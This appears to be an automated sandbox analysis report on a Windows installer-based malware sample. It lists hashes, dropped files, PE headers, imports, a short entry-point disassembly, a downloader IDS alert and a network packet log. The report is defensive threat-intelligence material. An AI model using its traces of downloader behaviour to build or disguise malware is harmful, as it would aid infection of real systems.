                                                        Category:dropped
                                                        Size (bytes):35074
                                                        Entropy (8bit):7.929273166684339
                                                        Encrypted:false
                                                        SSDEEP:768:/1qAL9ONp6yNZmL45EqsbSeIcggTHYRFvmgj14:/wW9DyLmc5xsmsg7R9ma4
                                                        MD5:E02B537614B9A3B20897B2CE88362B2F
                                                        SHA1:9E0BBCF243960400626DF59CE2F00A99D28464E5
                                                        SHA-256:5833AF3396DEF24CE4EBF4CABC1E4B7C47564835167F977C25FF8CBDCC568306
                                                        SHA-512:7014B6B8AB45E09735151E40FBD701D7CD7164E79AF7FD0FDB1497BD8AEDC092FEAB4CC443362EDD8E3F82993DF87E1E9ADB3A576A267BDCDE4C94E941A20140
                                                        Malicious:false
                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..VR...B.\n'.jN?.....Z.{C1.....@N.....P..;.#<b..L..}.*wn.. .9..\.......@...M..&O.G.FX......>..s.?*\...@..2M.?lPK.@..'".....?.h..'.....?..q...v(.'.q...r{.`..I.h.b.....s.K.Q.(....`.'.9...._....&....4..}?.!S.M7.=iw.S.S...sK...7q...I..M.;e..(9.z.q....ZNi.>.....Q..L..........c........0....O.....5S.......N}9....z.77..-.(.6....{..oA..|..4....&..7.N...(##....j.
                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 547x605, components 3
                                                        Category:dropped
                                                        Size (bytes):40564
                                                        Entropy (8bit):7.970435935833064
                                                        Encrypted:false
                                                        SSDEEP:768:EmF+WkDks/1TAMAlDmXMNHgnMSYb9dQfW44X7+znLdp0ja7xweTnuJ:EY+ksRAlDm0gMSYb/B44MnLdKja7eQn0
                                                        MD5:5D97A896225E838266ED45E035111307
                                                        SHA1:4C2B4255AB66255CB6FDBD1CC668D59A04FB0716
                                                        SHA-256:6122CD9B5F6B422F502C1AE9621096E1CBDD1CC8519F9846D61B0EB050D9A360
                                                        SHA-512:03802AD07BAA11F72843F6E8D9CBE477AAE608CF5FB6B6F3B2475A9CAF681FA6039F6520BAF3509FC2B45069550DDAA2901DFA5CDF28D2CF164621E105A14714
                                                        Malicious:false
                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......].#.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....f....v...4H.&...X....u6...r6..u6'(*.&G.."5WJ.....#..9v.i.........?...k....DS}..j..v....d....m.J......@>........}i5...)...q....j....\N.?.O.u..?J.u....M......EoL95.xh.+...Q...?J......@>C..1.......}.].p......Z.."...U\...c]2...]i.sC.l.s..t'..Q1.......... .5......`.....\9..J...C.j...c.5;.2..w..U.......[..Z...n3p>..vqm.P#....k.'..</..WQ.jJ.u..J.T...E0.jSM"
                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):187748
                                                        Entropy (8bit):1.2534161616514632
                                                        Encrypted:false
                                                        SSDEEP:3072:viD/FWcjS9V0XNgDhAq5q+ZhpMNY/rveNIvJWs99SBNGyCzrkGhrI:viD/FWcjS9V0XNgDhAq5q+ZhpMNY/rvi
                                                        MD5:664F0CBD44998A34FE4B192AF58382C2
                                                        SHA1:2EDB2244FD7C1D740DC8E5AA1EA559BB22BDA69D
                                                        SHA-256:845B140AC14A7A324D4741347CE98213992C5B1604783765199D52D7FD4B7336
                                                        SHA-512:389AEDDF6C015BCA238453013D6860CC160ABBE46D8BBB9CD0580EB33CB7B7EB78E3CADB42429076E45D0D0836D7C7F629C680CE7DAB3ACD0332142D56BEC0BC
                                                        Malicious:false
                                                        Preview:vvvvvvvvv.vvvvv..vvvvvv(vvvv.vvvvvvvvvvvvvvvv.vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv.vvvv.v.Zvvvvvvvvv..v,vvvvvvvv.vvvv'vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv.vvvvv.vvvvvvvv.vvXvvvvvvvvvvqvvvv.vvv.vvvvvvvvv^vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv.vvv.vvvvvv.vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv.vvvvvvvvvvvvvvvvvvv..vvvvvvvvvvvvvvv\vvvv.vvvvvvvUvKvvvvvvvvvvvvvvvvvvvvvvvcvvvvvvvvvvvvvvvvvvvvvvmvvvvvvvvvvvvvvvvvvvvvvvvvv.vvvvvvvvvvvvvvvvvvvvvvvvm.vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv.vvvvvvvvvv.vvvvvvvvvvvvvvvv.vvvvvvvvvvvvvvvvvvvvvvvvvvvv..vCvvvvvvvvvvvvvv.vvvvvvv v.vvvvvvvvvvvvvvvvvvvv.vvvvvvvvvvvvvvvvvvvvvvvvvvvvv.vvvvvvvyvv%vvvvvvvvvvv}vuvvvvv7vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv(!vvvvvvvvvvvvvv.vvv.vvvv.vvvvvvv.vvvvvvv.vv.vvvvevvvvvv.vvvvvvvv.vvv.vvvvvvvvv.v.vvvvvv.vvvvvvvvvv/vvvvvvvvvvvvvvvvv..vvvvv.vvv.vvv.vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv.vv.vvvvv.vvvvvvvvvv.vvlvvvvvvvvvv.vvvvvv.vvvvvvvvvvvvvvvvv.vvv.vvvvvvvvvvvvvvvvv.vvvvvvvv.vvvvvvvvvvvvvvvvvvvzvvvvvgvvvvvvvvvvvvvv(vv
                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):442710
                                                        Entropy (8bit):7.095179683517557
                                                        Encrypted:false
                                                        SSDEEP:6144:L0vhg5OVtF/NFsNa2qIg9VYTx1Ym4e0QZS5Xiab54WUpXr:wvhg5OXx3sFWqYmN0QZexVCXr
                                                        MD5:0525DE01989A10BA5950F190C627CF4E
                                                        SHA1:7B69BF5708822EB00A19FADAC65E1FC53AD10E49
                                                        SHA-256:447ED78CB5F606B2053CE1417C57E63E909860B3D4A0B54A8C4174187E679D33
                                                        SHA-512:A9FDF44FD52A10A1EF7277347E5102D8F9EB00BD244EABB53811A8FA031BC5935AEEDC0260EA89A2643BB95C0FC90AB47AEAE5D2A420799576A780121D0176D5
                                                        Malicious:false
                                                        Preview:.....R.2......2....................................::...................................,,.......................66..........<......."....-.....;......0....................................!!..................................$....................33.Y..8....S.........H......................................................uu.ww........CC.......................F..b...wwww.......................................................................W...............~.VVV...77...3......./........,,,,.............?........M.................G...........H.......................dd.................k.TT.......\..............k..........................=====............8888..?.............................................................}}}}}.`......tt..................c...........q..............................!!!....)......................CC....iiii...N.......................p...**........Y..m.ww............ddd.............A......HHH...........ppp.`...........4444.......{{{................UU...''''........
                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                        Category:dropped
                                                        Size (bytes):864
                                                        Entropy (8bit):3.2487469955980712
                                                        Encrypted:false
                                                        SSDEEP:12:8wl0ZsXowAOcuJEIJcw8P12yRy1J1FV0f+JRN1A4t2YZ/elFlSJm:86LgCzS72rsy+qy
                                                        MD5:89089F57D8C759A65582D962D838C8DD
                                                        SHA1:089EDC592B9C9E620EF83DB0421533F99CF7D808
                                                        SHA-256:89A934EA5AF995C462254FCFC5FEB44759AF56BC77556D14EAD43A9E8C885091
                                                        SHA-512:8F92EDC50CE2FCC5F54AA028B6A621CF2A83D485A0F1D2075255E293092A33487F750BD4AFEF47296592F8EB27898E72763B98899793136BE908859D736E87AA
                                                        Malicious:false
                                                        Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....\.1...........Documents.D............................................D.o.c.u.m.e.n.t.s.....h.2...........populaton.neu.L............................................p.o.p.u.l.a.t.o.n...n.e.u...........\.D.o.c.u.m.e.n.t.s.\.p.o.p.u.l.a.t.o.n...n.e.u.@.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.S.l.u.t.a.f.r.e.g.n.i.n.g.e.r.s.1.7.5.\.a.m.m.u.n.i.t.i.o.n.s.f.a.b.r.i.k.k.e.r.s.\.J.a.s.p.o.i.d.............)...............#.F..l.H.i.)...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:MS Windows registry file, NT/2000 or above
                                                        Category:dropped
                                                        Size (bytes):1835008
                                                        Entropy (8bit):4.465750656369712
                                                        Encrypted:false
                                                        SSDEEP:6144:4IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNwdwBCswSb+:tXD94+WlLZMM6YFHi++
                                                        MD5:EE84D9F2739F4AC0B0A0A762D2F7D803
                                                        SHA1:B980FA57984C3456E7C72C165B5AB95B2C318D14
                                                        SHA-256:CF26FC651ED8B7FFC56CF2F132D32B365E6F2EE346EBAFDFA7AFB3CD04AC1813
                                                        SHA-512:6EDD2BDA09CDD30D26EE2258C113F5C1456E2DD420348BC422F4702A04303CA0120585E0519908B1032E6C525167A3147A941196475DCFBC501BD6BE3F4B740A
                                                        Malicious:false
                                                        Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..e...................................................................................................................................................................................................................................................................................................................................................r.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.951120046834256
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
                                                        File size:656'403 bytes
                                                        MD5:32cb6ae82e91b97ac49e6df5412698a5
                                                        SHA1:c1adc2d7d481fc1638676f7c87da93acd6e79318
                                                        SHA256:3d29c1dac723e6cfea7beb14513bae42f49f5045f0ac8c9a604ff184045491dd
                                                        SHA512:671ea9d45c21beeaece5f054c4fe9e67b1e20c62e05eb18c3fb00d47d988a40102b493c5c719e683804d71f48145e29c60898340b83ca9b4ec24d90ebeacbfb5
                                                        SSDEEP:12288:1LVWnRxjpAholCSH+4l+JQtiJ7va2gsxytb0OmL2H8tEB2Ly6:1Lc/jp0ol7i+iNWsxZOmq8KALH
                                                        TLSH:A5D4235596574A37FA62047015B2D133CBF0AD13763E231B33C26FBF3931AA5C99A226
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....z.W.................^.........
                                                        Icon Hash:192c642d8ece6d0f
                                                        Entrypoint:0x4030d9
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x57017AA7 [Sun Apr 3 20:18:47 2016 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 00409198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004070A8h]
                                                        call dword ptr [004070A4h]
                                                        cmp ax, 00000006h
                                                        je 00007F3568755753h
                                                        push ebx
                                                        call 00007F35687586C1h
                                                        cmp eax, ebx
                                                        je 00007F3568755749h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 00407298h
                                                        push esi
                                                        call 00007F356875863Dh
                                                        push esi
                                                        call dword ptr [004070A0h]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F356875572Dh
                                                        push ebp
                                                        push 00000009h
                                                        call 00007F3568758694h
                                                        push 00000007h
                                                        call 00007F356875868Dh
                                                        mov dword ptr [00423704h], eax
                                                        call dword ptr [00407044h]
                                                        push ebx
                                                        call dword ptr [00407288h]
                                                        mov dword ptr [004237B8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 0041ECC8h
                                                        call dword ptr [00407174h]
                                                        push 00409188h
                                                        push 00422F00h
                                                        call 00007F35687582B7h
                                                        call dword ptr [0040709Ch]
                                                        mov ebp, 00429000h
                                                        push eax
                                                        push ebp
                                                        call 00007F35687582A5h
                                                        push ebx
                                                        call dword ptr [00407154h]
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x4748.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x5c5b0x5e003d4c7426917ca8533fbfc9cd63e19ba3False0.6603640292553191data6.411487375491561IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x70000x12460x140043fab6a80651bd97af8f34ecf44cd8acFalse0.42734375data5.005029341587408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x90000x1a7f80x40000798d060e552892531c88ed1710ae2cFalse0.6376953125data5.108396988130901IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x240000x120000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x360000x47480x4800aee2d632d6be6526458f55449bbb7ed1False0.5030924479166666data4.610743128074616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x362980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.512655601659751
                                                        RT_ICON0x388400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5295497185741088
                                                        RT_ICON0x398e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6391843971631206
                                                        RT_DIALOG0x39d500x144dataEnglishUnited States0.5216049382716049
                                                        RT_DIALOG0x39e980x100dataEnglishUnited States0.5234375
                                                        RT_DIALOG0x39f980x11cdataEnglishUnited States0.6091549295774648
                                                        RT_DIALOG0x3a0b80xc4dataEnglishUnited States0.5918367346938775
                                                        RT_DIALOG0x3a1800x60dataEnglishUnited States0.7291666666666666
                                                        RT_GROUP_ICON0x3a1e00x30dataEnglishUnited States0.8333333333333334
                                                        RT_VERSION0x3a2100x1f4dataEnglishUnited States0.552
                                                        RT_MANIFEST0x3a4080x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                        DLLImport
                                                        KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                        USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                        ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                        DescriptionData
                                                        Commentsbecut megalichthys
                                                        LegalTrademarksflamboyantizes kiksets rakkeren
                                                        OriginalFilenameundfangelsen resurceanvendelser.exe
                                                        Translation0x0409 0x04e4
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-02-18T05:29:22.222978+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449787142.250.186.142443TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 18, 2025 05:29:21.160742044 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:21.160846949 CET44349787142.250.186.142192.168.2.4
                                                        Feb 18, 2025 05:29:21.160933018 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:21.175581932 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:21.175612926 CET44349787142.250.186.142192.168.2.4
                                                        Feb 18, 2025 05:29:21.832202911 CET44349787142.250.186.142192.168.2.4
                                                        Feb 18, 2025 05:29:21.832331896 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:21.833276033 CET44349787142.250.186.142192.168.2.4
                                                        Feb 18, 2025 05:29:21.833440065 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:21.888776064 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:21.888860941 CET44349787142.250.186.142192.168.2.4
                                                        Feb 18, 2025 05:29:21.889239073 CET44349787142.250.186.142192.168.2.4
                                                        Feb 18, 2025 05:29:21.889307976 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:21.893903017 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:21.935333967 CET44349787142.250.186.142192.168.2.4
                                                        Feb 18, 2025 05:29:22.223033905 CET44349787142.250.186.142192.168.2.4
                                                        Feb 18, 2025 05:29:22.223120928 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:22.223407030 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:22.223493099 CET44349787142.250.186.142192.168.2.4
                                                        Feb 18, 2025 05:29:22.223555088 CET49787443192.168.2.4142.250.186.142
                                                        Feb 18, 2025 05:29:22.300679922 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:22.300745010 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:22.300822020 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:22.303967953 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:22.304001093 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:22.968533993 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:22.968621016 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:22.973062038 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:22.973084927 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:22.973500013 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:22.973563910 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:22.983133078 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:23.027326107 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.463074923 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.463170052 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.463571072 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.463634014 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.478075981 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.478164911 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.478203058 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.478261948 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.555227041 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.555330992 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.555371046 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.555397987 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.555408955 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.555434942 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.555464029 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.555464983 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.555495977 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.558995962 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.559632063 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.559648037 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.559698105 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.565294027 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.565351963 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.565366983 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.565412045 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.571156979 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.572659016 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.572674036 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.572731018 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.577559948 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.580399036 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.580413103 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.584335089 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.585139990 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.585196972 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.585211039 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.585264921 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.594510078 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.596323967 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.596338987 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.596391916 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.609832048 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.609895945 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.609910965 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.609970093 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.615933895 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.616300106 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.616313934 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.616365910 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.616374016 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.616398096 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.616430998 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.616456985 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.617005110 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.620551109 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.683738947 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.683825970 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.683849096 CET49796443192.168.2.4216.58.212.129
